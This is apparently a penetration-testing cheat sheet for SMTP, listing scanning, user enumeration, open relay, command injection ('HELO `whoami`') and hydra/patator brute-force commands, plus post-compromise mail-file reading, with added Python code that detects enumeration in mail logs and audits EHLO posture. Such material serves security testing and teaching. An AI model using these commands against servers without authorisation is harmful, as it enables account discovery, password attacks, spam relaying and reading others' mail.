Simple Mail Transfer Protocol

Environment Variables / Setup

export IP=
export PORT=25
export SECURE_PORT=587

Phase 1: Service Enumeration

Nmap SMTP Scripts

nmap --script="smtp-*" -p$PORT,$SECURE_PORT $IP   # quote the glob so the shell does not expand it
telnet $IP $PORT
nc -nv $IP $PORT

Phase 2: SMTP Commands & Enumeration

Basic SMTP Interaction

telnet $IP $PORT
HELO attacker.com
HELP
QUIT

User Enumeration

VRFY Command

# Test VRFY command for user enumeration
echo "VRFY root" | nc -nv $IP $PORT
echo "VRFY admin" | nc -nv $IP $PORT
echo "VRFY user" | nc -nv $IP $PORT

EXPN Command

# Test EXPN command for mailing list expansion
echo "EXPN root" | nc -nv $IP $PORT
echo "EXPN admin" | nc -nv $IP $PORT

RCPT TO Command

# Test RCPT TO for user enumeration (RFC 5321 requires the angle brackets; strict servers reject without them)
telnet $IP $PORT
HELO attacker.com
MAIL FROM:<test@attacker.com>
RCPT TO:<root@target.com>
RCPT TO:<admin@target.com>
# 250 = recipient accepted, 550 = user unknown; a server that answers 250 for every name cannot be enumerated this way
QUIT

Phase 3: Automated User Enumeration

SMTP User Enum Script

#!/bin/bash
# Save as smtp-user-enum.sh
for user in $(cat /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt); do
    echo "VRFY $user" | nc -w 3 $IP $PORT 2>/dev/null | grep -v "Connection"
done

Metasploit User Enumeration

use auxiliary/scanner/smtp/smtp_enum
set RHOSTS $IP
set USER_FILE /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt
run

smtp-user-enum Tool

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t $IP
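The server side of the three methods above: every VRFY, EXPN or RCPT TO probe for a non-existent account leaves a reject line in /var/log/mail.log, and a client that collects many of them in a short time is enumerating, not sending mail. This is an added example, not part of the original cheat sheet; the Postfix-style log lines, hostnames and addresses are constructed, and the three-reject threshold is an assumption to tune per site.

```python
import re
from collections import defaultdict

# Constructed Postfix-style smtpd log lines (not from a real server): 203.0.113.9
# probes VRFY and RCPT TO for unknown users; 198.51.100.4 just mistypes one address.
SAMPLE_LOG = """\
Mar  5 10:00:01 mx postfix/smtpd[2231]: connect from unknown[203.0.113.9]
Mar  5 10:00:01 mx postfix/smtpd[2231]: NOQUEUE: reject: VRFY from unknown[203.0.113.9]: 550 5.1.1 <bob>: Recipient address rejected: User unknown in local recipient table; to=<bob> proto=SMTP
Mar  5 10:00:02 mx postfix/smtpd[2231]: NOQUEUE: reject: VRFY from unknown[203.0.113.9]: 550 5.1.1 <carol>: Recipient address rejected: User unknown in local recipient table; to=<carol> proto=SMTP
Mar  5 10:00:02 mx postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[203.0.113.9]: 550 5.1.1 <dave@example.test>: Recipient address rejected: User unknown in local recipient table; from=<test@attacker.example> to=<dave@example.test> proto=SMTP helo=<attacker.example>
Mar  5 10:00:03 mx postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[203.0.113.9]: 550 5.1.1 <erin@example.test>: Recipient address rejected: User unknown in local recipient table; from=<test@attacker.example> to=<erin@example.test> proto=SMTP helo=<attacker.example>
Mar  5 10:00:03 mx postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[203.0.113.9]: 550 5.1.1 <frank@example.test>: Recipient address rejected: User unknown in local recipient table; from=<test@attacker.example> to=<frank@example.test> proto=SMTP helo=<attacker.example>
Mar  5 10:05:10 mx postfix/smtpd[2240]: connect from partner.example[198.51.100.4]
Mar  5 10:05:10 mx postfix/smtpd[2240]: NOQUEUE: reject: RCPT from partner.example[198.51.100.4]: 550 5.1.1 <alise@example.test>: Recipient address rejected: User unknown in local recipient table; from=<ann@partner.example> to=<alise@example.test> proto=ESMTP helo=<partner.example>
"""

# Matches the reject line shape assumed above: command, client IP, 550 "User unknown"
REJECT_RE = re.compile(
    r"postfix/smtpd\[\d+\]: NOQUEUE: reject: (?P<cmd>VRFY|RCPT) from "
    r"\S+\[(?P<ip>[\d.]+)\]: 550 .*?User unknown"
)

def unknown_user_rejects(log_text):
    """Count 550 'User unknown' rejects per client IP, split by SMTP command."""
    counts = defaultdict(lambda: {"VRFY": 0, "RCPT": 0})
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            counts[m.group("ip")][m.group("cmd")] += 1
    return dict(counts)

def flag_enumeration(log_text, threshold=3):
    """Flag a client that collects `threshold` or more unknown-user rejects, or that
    issues VRFY at all: real mail clients do not probe addresses this way."""
    alerts = []
    for ip, c in unknown_user_rejects(log_text).items():
        total = c["VRFY"] + c["RCPT"]
        if c["VRFY"] or total >= threshold:
            alerts.append((ip, total))
    return sorted(alerts)

if __name__ == "__main__":
    for ip, total in flag_enumeration(SAMPLE_LOG):
        print(f"possible user enumeration from {ip}: {total} unknown-user rejects")
```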

Phase 4: SMTP Vulnerabilities

Open Relay Testing

# A relay test must use a recipient at a domain this server does not host;
# a 250 for one of the server's own domains is normal local delivery, not relaying
telnet $IP $PORT
HELO attacker.com
MAIL FROM:<attacker@evil.com>
RCPT TO:<victim@external-domain.com>
DATA
Subject: Test Email

This is a test email to check for open relay.
.
QUIT
# 250 after RCPT TO and after the final "." = open relay; 554 "Relay access denied" = relaying is blocked

Command Injection Testing

# Test for command injection in SMTP commands
telnet $IP $PORT
HELO `whoami`
MAIL FROM: test@`whoami`.com

Authentication Testing

# Test for SMTP AUTH (AUTH LOGIN sends username and password base64-encoded, which is not encryption)
# Encode the credentials first
echo -n "username" | base64
echo -n "password" | base64
telnet $IP $PORT
EHLO attacker.com
AUTH LOGIN
# Server replies 334 VXNlcm5hbWU6 ("Username:") - paste the encoded username
# Server replies 334 UGFzc3dvcmQ6 ("Password:") - paste the encoded password
# 235 = authenticated, 535 = authentication failed

Phase 5: SMTP Security Features

Check Security Extensions

telnet $IP $PORT
EHLO attacker.com
# Look for:
# STARTTLS - TLS encryption (absent = the whole session, AUTH included, runs in clear)
# AUTH - Authentication methods (advertised before STARTTLS = credentials can be captured in clear)
# SIZE - Message size limits
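The EHLO reply and the VRFY/EXPN responses from Phase 2 can be read off a captured session and turned into a hardening report. This is an added example, not code from the original cheat sheet: the transcript is constructed (the replies to EHLO, "VRFY root", "VRFY nosuchuser9999" and "EXPN staff", in that order), and the posture keys are my own naming.

```python
import re

# Constructed transcript (not real server output): banner, the EHLO reply,
# then the replies to "VRFY root", "VRFY nosuchuser9999" and "EXPN staff".
SAMPLE_SESSION = """220 mail.example.test ESMTP Postfix
250-mail.example.test
250-SIZE 10240000
250-STARTTLS
250-AUTH PLAIN LOGIN
250 8BITMIME
252 2.0.0 root
550 5.1.1 <nosuchuser9999>: Recipient address rejected: User unknown
502 5.5.1 EXPN command not implemented
"""

REPLY_RE = re.compile(r"^(\d{3})([ -])(.*)$")

def parse_replies(text):
    """Group lines into (code, [lines]); '250-' continues a reply, '250 ' ends it."""
    replies, lines = [], []
    for raw in text.splitlines():
        m = REPLY_RE.match(raw)
        if not m:
            continue                     # skip echoed commands or noise
        code, sep, body = m.groups()
        lines.append(body)
        if sep == " ":                   # final line of this reply
            replies.append((code, lines))
            lines = []
    return replies

def ehlo_extensions(ehlo_lines):
    """Line 1 is the greeting; the rest are 'KEYWORD [params...]' extensions."""
    return {l.split()[0].upper(): l.split()[1:] for l in ehlo_lines[1:] if l.strip()}

def posture(session):
    banner, ehlo, vrfy_real, vrfy_bogus, expn = parse_replies(session)[:5]
    ext = ehlo_extensions(ehlo[1])
    return {
        "banner_names_software": bool(re.search(r"postfix|sendmail|exim|exchange|qmail",
                                                banner[1][0], re.I)),
        "starttls": "STARTTLS" in ext,
        # AUTH advertised on the plaintext EHLO: a client may send credentials in clear
        "auth_before_tls": "AUTH" in ext,
        "size_limit": int(ext["SIZE"][0]) if ext.get("SIZE") else None,
        # VRFY leaks accounts whenever a real and a bogus name get different codes
        "vrfy_enumerable": vrfy_real[0] != vrfy_bogus[0],
        "expn_disabled": expn[0] == "502",
    }
```

Run `posture(SAMPLE_SESSION)` to get the report; a server that answers VRFY with the same code for real and bogus names, and hides AUTH until after STARTTLS, comes back clean on those two keys.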

STARTTLS Testing

# Test TLS encryption
openssl s_client -starttls smtp -connect $IP:$PORT
openssl s_client -starttls smtp -connect $IP:$SECURE_PORT   # submission port
openssl s_client -connect $IP:465  # SMTPS (implicit TLS)

Phase 6: Mail Server Software Detection

Version Fingerprinting

# Check SMTP banner for version info (telnet prints its own "Trying..." line first, so grab the banner with nc)
nc -nv -w 3 $IP $PORT </dev/null | head -1
nmap -sV -p$PORT $IP

# Common SMTP servers:
# Postfix
# Sendmail
# Microsoft Exchange
# qmail
# Exim

Software-Specific Vulnerabilities

Look up discovered software versions for known CVEs:

  • Postfix: Check for command injection vulnerabilities
  • Sendmail: Check for buffer overflow vulnerabilities
  • Exchange: Check for authentication bypass vulnerabilities

Phase 7: SMTP Brute Force

Authentication Brute Force

# With hydra (if AUTH is enabled)
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s $PORT smtp://$IP

# With patator
patator smtp_login host=$IP user=admin password=FILE0 0=/usr/share/wordlists/rockyou.txt

Note: Be careful with brute force - may trigger account lockouts

Phase 8: Mail File Access

Check for Mail Files

If you gain system access, check for mail files:

# Common mail directories
/var/mail/
/var/spool/mail/
/home/*/mail/
/home/*/Maildir/

# Mail logs
/var/log/mail.log
/var/log/maillog

Reading Mail Files

# Read mail files for sensitive information
cat /var/mail/user
cat /var/spool/mail/user
find /home -name "*.eml" -o -name "*.msg" 2>/dev/null

Common SMTP Response Codes

220 - Service ready
221 - Service closing transmission channel
250 - Requested mail action okay, completed
354 - Start mail input
421 - Service not available
450 - Requested mail action not taken: mailbox unavailable
451 - Requested action aborted: local error in processing
452 - Requested action not taken: insufficient system storage
500 - Syntax error, command unrecognized
501 - Syntax error in parameters or arguments
502 - Command not implemented
503 - Bad sequence of commands
504 - Command parameter not implemented
550 - Requested action not taken: mailbox unavailable
551 - User not local; please try forward-path
552 - Requested mail action aborted: exceeded storage allocation
553 - Requested action not taken: mailbox name not allowed
554 - Transaction failed

SMTP Enumeration Checklist

  • Banner grabbing and version identification
  • VRFY command user enumeration
  • EXPN command mailing list enumeration
  • RCPT TO user enumeration
  • Open relay testing
  • SMTP AUTH brute force (if enabled)
  • STARTTLS security testing
  • Command injection testing
  • Mail file access (if system compromised)

Tools Summary

# Manual enumeration
telnet, nc, openssl

# Automated enumeration
smtp-user-enum, nmap scripts

# Brute force
hydra, patator, metasploit

# User enumeration wordlists
/usr/share/wordlists/seclists/Usernames/

Next Steps

Once SMTP enumeration is complete:

  1. Document discovered users for password attacks
  2. Test discovered credentials on other services
  3. Check for mail relay abuse opportunities
  4. Analyze mail files if system access gained

Resources